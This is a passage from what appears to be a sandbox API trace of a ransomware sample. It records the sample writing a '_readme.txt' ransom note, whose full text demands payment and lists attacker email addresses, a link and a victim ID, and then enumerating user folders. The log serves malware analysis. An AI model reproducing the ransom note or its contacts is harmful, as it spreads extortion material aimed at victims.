Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.726] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edbd8 [0227.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.726] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.726] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.726] PathFindFileNameW (pszPath="") returned="" [0227.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.727] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.727] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.727] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.727] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.727] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0227.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.728] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0227.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.728] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.728] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3c18 [0227.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0227.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37b8170 [0227.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x85a) returned 0x325c3b0 [0227.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325c3b0, cbMultiByte=2138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 1115 [0227.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325cc18 [0227.732] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 1114 [0227.732] WriteFile (in: hFile=0x63c, lpBuffer=0x325cc18*, nNumberOfBytesToWrite=0x45a, lpNumberOfBytesWritten=0x3adfb64, lpOverlapped=0x0 | out: lpBuffer=0x325cc18*, lpNumberOfBytesWritten=0x3adfb64*=0x45a, lpOverlapped=0x0) returned 1 [0227.733] CloseHandle (hObject=0x63c) returned 1 [0227.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cc18 | out: hHeap=0x630000) returned 1 [0227.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c319580, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.733] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c319580, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.734] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed800 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.734] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.734] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6930 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31de170 | out: hHeap=0x630000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.735] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3bf8 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5180 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.735] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, 